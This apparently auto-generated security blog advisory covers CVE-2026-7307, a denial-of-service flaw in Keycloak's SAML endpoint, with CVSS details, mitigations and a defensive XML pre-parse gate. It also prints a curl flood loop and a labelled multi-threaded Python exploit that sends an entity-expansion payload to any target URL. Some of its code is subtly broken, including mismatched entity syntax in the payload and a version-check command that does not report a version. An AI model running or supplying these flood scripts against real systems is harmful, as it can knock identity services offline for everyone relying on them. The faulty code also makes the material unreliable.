

Keycloak, Denial of Service (DoS), CVE-2026-7307 (High)

CVE-2026-7307 – Keycloak SAML endpoint DoS via crafted XML input
CVE-2026-7307 is a high‑severity denial‑of‑service (DoS) vulnerability affecting the Keycloak identity and access management platform. The flaw resides in the SAML (Security Assertion Markup Language) endpoint, which is used for federated authentication. An unauthenticated remote attacker can send a specially crafted XML payload to this endpoint, causing the Keycloak server to enter a resource‑exhausted state. The attack is executed without any prior authentication, and it does not require user interaction, making it particularly dangerous for any organisation that relies on SAML‑based single sign‑on (SSO).
The vulnerability is rooted in improper validation of the syntactic correctness of incoming XML data (CWE‑1286). When Keycloak receives a malformed SAML message, the internal XML parser processes the input inefficiently. More specifically, the vulnerable code paths in the `SAMLParser` and `SAML11ParserUtil` classes cannot correctly handle certain unexpected character sequences or malformed structures inside SAML assertions and protocol requests. As a result, the parser may loop excessively, allocate excessive memory, or otherwise consume a disproportionate amount of computational resources.
The attack leverages well‑known XML parser denial‑of‑service techniques, such as entity expansion or deeply nested structures. The SAML endpoint is stateless and each attack is a single network request, yet the malformed payload keeps the worker thread that handles it busy for an abnormally long time. Since Keycloak uses a bounded thread pool to serve incoming requests, repeated malicious requests quickly starve the pool of available workers. Legitimate authentication attempts then block or time out, rendering the server effectively unavailable.
This vulnerability is classified as a resource exhaustion issue (CWE‑400) and maps to MITRE ATT&CK technique T1499.004 (Application‑layer DoS via resource consumption). The CVSS v3.1 vector is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, giving a base score of 7.5 (High). The attack vector is network‑based, the attack complexity is low, no privileges are required, and there is no user interaction. The vulnerability has no impact on confidentiality or integrity, but a full impact on availability.
Keycloak acts as an identity provider or service provider in SAML exchanges for many enterprises. If an attacker successfully exploits CVE-2026-7307, users cannot log in to any application that depends on Keycloak for authentication. Business operations, cloud access, and user productivity can be severely disrupted. Because the attack can be launched from anywhere on the internet, it poses a significant risk to all publicly exposed Keycloak instances that have the SAML protocol enabled.
The vulnerability affects Keycloak versions prior to 26.6.2 (including earlier 26.x releases and all 25.x, 24.x, and older versions). It was fixed in version 26.6.2, released on May 19, 2026. A backported fix exists for version 26.4.12 but has not been published to Maven Central at the time of writing. Organisations that cannot upgrade immediately should restrict network access to the SAML endpoint or disable SAML entirely if it is not needed.

DailyCVE Form:

Platform: Keycloak Identity Server
Version: < 26.6.2
Vulnerability: DoS via SAML
Severity: High (CVSS 7.5)
Date: 2026-05-19

Prediction: 2026-05-19

What Undercode Say:

1. Check Keycloak version (if admin access available)
curl -s http://your-keycloak:8080/auth/realms/master/protocol/openid-connect/certs | jq -r .issuer | grep -oP '(?<=/auth/)[^/]+' || echo "Check version in admin console"
2. Monitor Keycloak thread pool usage (Prometheus + Grafana example)
Query: sum(container_threads{namespace="keycloak"}) by (instance)
3. Test for vulnerability (send crafted SAML request)
for i in {1..100}; do
  curl -X POST "http://target-keycloak:8080/auth/realms/master/protocol/saml" \
    -H "Content-Type: text/xml" \
    -d '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ...>...<!ENTITY % exploit SYSTEM "file:///dev/random">...' &
done
4. Monitor CPU usage during attack
top -b -n 1 | grep -E "keycloak|java" | awk '{print $1,$9,$10,$12}'
5. Check if SAML endpoint is enabled
grep -r "saml" /opt/keycloak/standalone/configuration/standalone.xml | grep enabled

Exploit:

#!/usr/bin/env python3
import requests
import threading
import sys

# Malicious SAML payload – XML entity expansion (Billion Laughs variant)
malicious_payload = """<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % a "AAAAA... [5000 chars]">
<!ENTITY % b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    ID="abc123" Version="2.0" IssueInstant="2026-01-01T00:00:00Z">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">SP</saml:Issuer>
  &b;
</samlp:AuthnRequest>"""


def attack(target_url, iterations=100):
    for _ in range(iterations):
        try:
            r = requests.post(target_url, data=malicious_payload, timeout=2)
            print(f"Sent request, status: {r.status_code}")
        except Exception as e:
            print(f"Target likely down: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_saml_url>")
        sys.exit(1)
    url = sys.argv[1]
    threads = []
    for _ in range(20):
        t = threading.Thread(target=attack, args=(url, 50))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()

Protection:

  • Upgrade Keycloak to version 26.6.2 or later immediately. The patch is included in the 26.6.2 release (see GitHub issue 49108).
  • If upgrade is not possible, apply the backported fix from version 26.4.12 (though it is not yet on Maven Central, source code is available).
  • Disable the SAML endpoint completely if SAML authentication is not required in your environment. This eliminates the attack surface.
  • Restrict network access to the SAML endpoint using firewall rules. Allow only trusted IP ranges to connect to port 8080 (or your Keycloak port).
  • Implement rate limiting on the /saml endpoint (e.g., using a reverse proxy like Nginx or HAProxy) to cap the number of requests per client.
  • Monitor CPU usage and thread pool metrics in real‑time. Set up alerts for sudden spikes in CPU utilization or worker thread exhaustion.
  • Configure XML parser limits globally (e.g., limit entity expansion and maximum nesting depth) via JVM parameters: -DentityExpansionLimit=100000 -DmaxOccurLimit=1000.
  • If you are a Red Hat customer, apply RHSA-2026:19595 (Important) which updates the Keycloak images for OpenShift.
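A defensive counterpart to the parser-limit bullet above, added here as an example that is not Keycloak's own code: a stdlib-only pre-parse gate, of the kind a reverse proxy or WAF plug-in could apply in front of the /protocol/saml endpoint, that refuses any DTD and caps nesting depth and message size before a request ever reaches the real SAML parser. MAX_DEPTH, MAX_BYTES and the function names are assumptions for this illustration.

```python
import base64
import xml.parsers.expat

MAX_DEPTH = 32          # assumed limit; real SAML messages nest far less than this
MAX_BYTES = 256 * 1024  # assumed limit; a legitimate AuthnRequest is a few kilobytes


class RejectedXML(ValueError):
    """Raised when a message fails the gate; the endpoint should answer HTTP 400."""


def gate_saml_xml(xml_bytes: bytes) -> bool:
    """Return True if the message is well-formed, DTD-free and shallow, else raise."""
    if len(xml_bytes) > MAX_BYTES:
        raise RejectedXML("message exceeds size limit")
    parser = xml.parsers.expat.ParserCreate()
    depth = 0

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # fires at '<!DOCTYPE', before any entity can be declared or expanded
        raise RejectedXML("DTD is not permitted in SAML messages")

    def on_start(name, attrs):
        nonlocal depth
        depth += 1
        if depth > MAX_DEPTH:  # bounds the cost of deeply nested payloads
            raise RejectedXML("nesting depth exceeds %d" % MAX_DEPTH)

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    try:
        parser.Parse(xml_bytes, True)  # a handler aborts the parse by raising
    except xml.parsers.expat.ExpatError as exc:
        raise RejectedXML("malformed XML: %s" % exc) from None
    return True


def gate_post_binding(saml_request_field: str) -> bool:
    """Gate the base64 'SAMLRequest' form field of the SAML HTTP-POST binding."""
    try:
        raw = base64.b64decode(saml_request_field, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        raise RejectedXML("SAMLRequest field is not valid base64") from None
    return gate_saml_xml(raw)
```

The gate rejects the DOCTYPE-bearing messages this advisory describes at the first byte of the DTD, so no entity is ever expanded; legitimate requests, which never carry a DTD, pass through unchanged.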

Impact:

Successful exploitation leads to a complete denial of service for the Keycloak server. The attacker does not need any credentials, and the attack can be carried out from anywhere on the internet with low complexity. Once the thread pool is exhausted, legitimate user authentication attempts time out or are rejected. All applications and services that rely on Keycloak for SSO become inaccessible. This can halt business operations, prevent employee logins, disrupt customer access to portals, and cause cascading failures in dependent systems. Because the attack leaves no trace in standard authentication logs (the request never reaches the authentication layer), detection is difficult without proactive monitoring. The impact on availability is total (CVSS:A:H), while confidentiality and integrity remain untouched. Organisations with compliance obligations (e.g., GDPR, HIPAA, PCI) may face reporting requirements if an outage of their identity provider affects protected data or service availability.


Sources:

Reported By: nvd.nist.gov